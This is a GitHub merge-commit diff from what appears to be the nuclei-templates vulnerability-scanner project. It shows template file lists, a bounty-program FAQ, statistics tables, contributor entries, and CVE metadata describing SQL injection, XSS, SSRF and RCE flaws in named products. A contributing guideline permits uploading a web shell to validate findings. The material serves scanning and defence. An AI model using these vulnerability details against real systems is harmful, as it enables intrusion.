Merge branch 'main' into patch-17

patch-12
Ritik Chaddha 2024-10-18 18:36:27 +05:30 committed by GitHub
commit feea39c6b6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
455 changed files with 9354 additions and 6709 deletions

View File

@ -1,69 +1,38 @@
code/cves/2024/CVE-2024-4340.yaml
code/cves/2024/CVE-2024-45409.yaml
http/cves/2017/CVE-2017-5871.yaml
http/cves/2019/CVE-2019-19411.yaml
http/cves/2021/CVE-2021-25094.yaml
http/cves/2021/CVE-2021-40272.yaml
http/cves/2023/CVE-2023-0676.yaml
http/cves/2023/CVE-2023-27641.yaml
http/cves/2023/CVE-2023-39007.yaml
http/cves/2023/CVE-2023-4151.yaml
http/cves/2023/CVE-2023-47105.yaml
http/cves/2024/CVE-2024-3234.yaml
http/cves/2024/CVE-2024-32964.yaml
http/cves/2024/CVE-2024-35627.yaml
http/cves/2024/CVE-2024-3753.yaml
http/cves/2024/CVE-2024-38816.yaml
http/cves/2024/CVE-2024-43160.yaml
http/cves/2024/CVE-2024-43917.yaml
http/cves/2024/CVE-2024-45440.yaml
http/cves/2024/CVE-2024-46627.yaml
http/cves/2024/CVE-2024-4940.yaml
http/cves/2024/CVE-2024-5488.yaml
http/cves/2024/CVE-2024-6517.yaml
http/cves/2024/CVE-2024-7354.yaml
http/cves/2024/CVE-2024-7714.yaml
http/cves/2024/CVE-2024-7854.yaml
http/cves/2024/CVE-2024-8021.yaml
http/cves/2024/CVE-2024-8877.yaml
http/cves/2024/CVE-2024-9463.yaml
http/cves/2024/CVE-2024-9465.yaml
http/default-logins/datagerry/datagerry-default-login.yaml
http/default-logins/netdisco/netdisco-default-login.yaml
http/exposed-panels/dockwatch-panel.yaml
http/exposed-panels/enablix-panel.yaml
http/exposed-panels/gitlab-explore.yaml
http/exposed-panels/gitlab-saml.yaml
http/exposed-panels/loxone-web-panel.yaml
http/exposed-panels/m-bus-panel.yaml
http/exposed-panels/macos-server-panel.yaml
http/exposed-panels/riello-netman204-panel.yaml
http/exposed-panels/rstudio-panel.yaml
http/exposed-panels/saia-pcd-panel.yaml
http/exposed-panels/workspace-one-uem-ssp.yaml
http/exposures/logs/action-controller-exception.yaml
http/exposures/logs/delphi-mvc-exception.yaml
http/exposures/logs/expression-engine-exception.yaml
http/exposures/logs/lua-runtime-error.yaml
http/exposures/logs/mako-runtime-error.yaml
http/exposures/logs/microsoft-runtime-error.yaml
http/exposures/logs/mongodb-exception-page.yaml
http/exposures/logs/sap-logon-error-message.yaml
http/exposures/logs/twig-runtime-error.yaml
http/miscellaneous/seized-site.yaml
http/misconfiguration/ariang-debug-console.yaml
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml
http/misconfiguration/netdisco/netdisco-unauth.yaml
http/technologies/arcgis-detect.yaml
http/technologies/dizquetv-detect.yaml
http/technologies/ivanti-epm-detect.yaml
http/technologies/microsoft/default-azure-function-app.yaml
http/technologies/vertigis-detect.yaml
http/technologies/wiki-js-detect.yaml
http/technologies/windows-communication-foundation-detect.yaml
http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml
http/token-spray/api-delighted.yaml
http/token-spray/api-intigriti.yaml
http/token-spray/api-telegram.yaml
http/vulnerabilities/retool/retool-svg-xss.yaml
http/vulnerabilities/wordpress/ninja-forms-xss.yaml
http/cves/2015/CVE-2015-8562.yaml
http/cves/2018/CVE-2018-7192.yaml
http/cves/2018/CVE-2018-7193.yaml
http/cves/2018/CVE-2018-7196.yaml
http/cves/2021/CVE-2021-45811.yaml
http/cves/2023/CVE-2023-1315.yaml
http/cves/2023/CVE-2023-1317.yaml
http/cves/2023/CVE-2023-1318.yaml
http/cves/2024/CVE-2024-32735.yaml
http/cves/2024/CVE-2024-32736.yaml
http/cves/2024/CVE-2024-32737.yaml
http/cves/2024/CVE-2024-32738.yaml
http/cves/2024/CVE-2024-32739.yaml
http/cves/2024/CVE-2024-3656.yaml
http/cves/2024/CVE-2024-39713.yaml
http/cves/2024/CVE-2024-43360.yaml
http/cves/2024/CVE-2024-44349.yaml
http/cves/2024/CVE-2024-45488.yaml
http/cves/2024/CVE-2024-46310.yaml
http/cves/2024/CVE-2024-5910.yaml
http/cves/2024/CVE-2024-8698.yaml
http/default-logins/zebra/zebra-printer-default-login.yaml
http/exposed-panels/freescout-panel.yaml
http/exposed-panels/paloalto-expedition-panel.yaml
http/exposed-panels/sqlpad-panel.yaml
http/exposed-panels/traccar-panel.yaml
http/exposed-panels/txadmin-panel.yaml
http/exposed-panels/usermin-panel.yaml
http/exposed-panels/veritas-netbackup-panel.yaml
http/exposed-panels/vmware-aria-panel.yaml
http/misconfiguration/root-path-disclosure.yaml
http/technologies/accellion-detect.yaml
http/technologies/mirth-connect-detect.yaml
http/technologies/oracle-fusion-detect.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
passive/cves/2024/CVE-2024-40711.yaml

View File

@ -56,6 +56,7 @@ Along with the P.O.C following are the required fields in the info section for s
- If there are more than 1 template for a tech create a separate folder for it
- Don't share any vulnerable URL publicly on Github or Discord channel.
- We should only upload a web shell as a last resort to validate the vulnerability, and if we do upload a file, make sure the file name is random(`{{randstr}}`)
- Do not include code templates for exploits that can be written using HTTP or JavaScript. We avoid adding additional exploit code to the project unless there is an exception.
### **Submitting a PR**

75
Community-Rewards-FAQ.md Normal file
View File

@ -0,0 +1,75 @@
# Nuclei Templates Community Rewards Program - FAQ
## What is the purpose of this rewards program?
The program is designed to reward the community for their efforts in contributing high-quality templates for critical and trending vulnerabilities.
## What are the bounty ranges for template submissions?
Bounties range from **$50 to $250**, depending on the complexity of the template and the effort required.
## Where can I find bounty issues?
Only issues listed by us on our GitHub repository with the 💎 **Bounty** label are eligible for rewards. You can find these bounty issues [here](https://github.com/projectdiscovery/nuclei-templates/issues?q=is%3Aissue%20state%3Aopen%20label%3A%22%F0%9F%92%8E%20Bounty%22)
## What is the acceptance criteria for templates?
Templates must meet the following criteria:
1. **Complete POC**: A full Proof of Concept (POC) must be provided and not rely solely on version detection.
2. **Debug Data**: Include debug data to assist with template validation.
3. **Validation Required**: The template will be reviewed and validated before rewards are given.
4. **Accurate Matchers**: Use strong matchers to avoid false positives.
> **Note**: Triagers will make the final decision on whether a template qualifies for a reward based on validation and the acceptance criteria outlined.
## How do I start working on a bounty issue?
1. **Find an Issue**: Look for issues tagged with 💎 **Bounty**.
2. **Declare Work**: Comment with `/attempt #<issue_number>` to claim the issue.
3. **Submit Work**: Submit your pull request with `/claim #<issue_number>` in the PR description when ready.
## How often are new bounty issues added?
We add new bounty issues on a **weekly basis**, so make sure to check back regularly for fresh opportunities. In the future, you can expect many more bounty issues as the program expands, allowing more opportunities for contributors to participate and earn rewards.
## Can I collaborate with others?
Yes, you can collaborate with other contributors and split rewards by commenting:
```
/claim #<issue_number>
/split @contributor1
/split @contributor2
```
## Is there a limit to how many issues I can work on?
You can work on up to **3 issues** simultaneously.
## What happens if I dont complete an issue on time?
Issues must be completed within **2 months**, or they will be closed.
## How are rewards distributed?
Rewards are distributed once the template is fully validated. If the issue remains unresolved for **few weeks**, the bounty may increase.
## What should I include in my template submission?
Include the following:
- **Complete POC**: A working Proof of Concept.
- **Matchers**: Multiple matchers to prevent false positives.
- **Debug Data**: Data to assist the triage team in validation.
- **Metadata**: Include required fields like `id`, `name`, `author`, `severity`, `description`, and `reference`.
## What types of templates will be rejected?
Templates may be rejected if they:
- Rely solely on version detection.
- Lack a complete POC.
- Contain weak matchers or redundant changes to existing templates.
## What should I avoid when submitting a template?
- Avoid sharing real-world targets publicly.
- Dont submit templates with weak matchers.
- Avoid unnecessary changes to existing templates.
## Is there a leaderboard for contributors?
Yes! We now have a **leaderboard** that showcases top contributors. You can check it out here: [Leaderboard](https://cloud.projectdiscovery.io/templates/leaderboard).
## Is this program permanent?
The rewards program is currently a test run, but we may make changes based on community feedback.
## What additional rewards are available besides bounties?
Beyond bounties, we also reward contributors with:
- **Swag** such as t-shirts and stickers.
- **Invites to security conferences** for standout contributors.
- **Stickers** as a token of appreciation for all first-time contributors, regardless of the bounty.
> Contributors who feel their pull request or issue was overlooked for first-time contributor stickers can ping us on our Discord for assistance: [ProjectDiscovery Discord](https://discord.com/invite/projectdiscovery).

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |
**718 directories, 9584 files**.
**723 directories, 9654 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |

View File

@ -20,10 +20,10 @@ code:
matchers:
- type: word
words:
- "true"
- "false"
extractors:
- type: dsl
dsl:
- '"AllowUsersToChangePassword Policy is not enabled in your AWS account"'
# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a110f462d8f5e4466b712fd0e894e70d3f25a2880789f42656e9a234f347f0ed022100c3b0fa07fb3f150db61f3c0715c8197371d98a9b4fe21f2837c2243ceb33b064:922c64590222798bb761d5b6d8e72950

View File

@ -1438,7 +1438,8 @@
"website": "https://pwn.by/noraj",
"email": ""
}
},{
},
{
"author": "mabdullah22",
"links": {
"github": "https://www.github.com/maabdullah22",
@ -1447,5 +1448,26 @@
"website": "",
"email": ""
}
},
{
"author": "rxerium",
"links": {
"github": "https://www.github.com/rxerium",
"twitter": "https://twitter.com/rxerium",
"linkedin": "",
"website": "https://rxerium.com",
"email": "rishi@rxerium.com"
}
},
{
"author": "edoardottt",
"links": {
"github": "https://github.com/edoardottt",
"twitter": "https://twitter.com/edoardottt2",
"linkedin": "https://www.linkedin.com/in/edoardoottavianelli/",
"website": "https://edoardoottavianelli.it/",
"email": ""
}
}
]

View File

@ -317,6 +317,7 @@
{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"medium","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"}
{"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-8349.yaml"}
{"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-8399.yaml"}
{"ID":"CVE-2015-8562","Info":{"Name":"Joomla HTTP Header Unauthenticated - Remote Code Execution","Severity":"high","Description":"Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-8562.yaml"}
{"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2015/CVE-2015-8813.yaml"}
{"ID":"CVE-2015-9312","Info":{"Name":"NewStatPress \u003c=1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-9312.yaml"}
{"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-9323.yaml"}
@ -628,6 +629,9 @@
{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"}
{"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"}
{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"}
{"ID":"CVE-2018-7192","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"message\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7192.yaml"}
{"ID":"CVE-2018-7193","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"order\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7193.yaml"}
{"ID":"CVE-2018-7196","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"sort\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7196.yaml"}
{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"}
{"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"}
{"ID":"CVE-2018-7314","Info":{"Name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7314.yaml"}
@ -1501,6 +1505,7 @@
{"ID":"CVE-2021-45382","Info":{"Name":"D-Link - Remote Command Execution","Severity":"critical","Description":"A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45382.yaml"}
{"ID":"CVE-2021-45422","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process \"count\" parameter via GET.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-45422.yaml"}
{"ID":"CVE-2021-45428","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45428.yaml"}
{"ID":"CVE-2021-45811","Info":{"Name":"osTicket 1.15.x - SQL Injection","Severity":"medium","Description":"A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-45811.yaml"}
{"ID":"CVE-2021-45967","Info":{"Name":"Pascom CPS Server-Side Request Forgery","Severity":"critical","Description":"Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45967.yaml"}
{"ID":"CVE-2021-45968","Info":{"Name":"Pascom CPS - Local File Inclusion","Severity":"high","Description":"Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45968.yaml"}
{"ID":"CVE-2021-46005","Info":{"Name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","Severity":"medium","Description":"Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-46005.yaml"}
@ -2020,6 +2025,9 @@
{"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"}
{"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"}
{"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"}
{"ID":"CVE-2023-1315","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1315.yaml"}
{"ID":"CVE-2023-1317","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1317.yaml"}
{"ID":"CVE-2023-1318","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1318.yaml"}
{"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"}
{"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"}
{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"}
@ -2529,6 +2537,11 @@
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-32735","Info":{"Name":"CyberPower - Missing Authentication","Severity":"critical","Description":"An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-32735.yaml"}
{"ID":"CVE-2024-32736","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32736.yaml"}
{"ID":"CVE-2024-32737","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32737.yaml"}
{"ID":"CVE-2024-32738","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32738.yaml"}
{"ID":"CVE-2024-32739","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32739.yaml"}
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"}
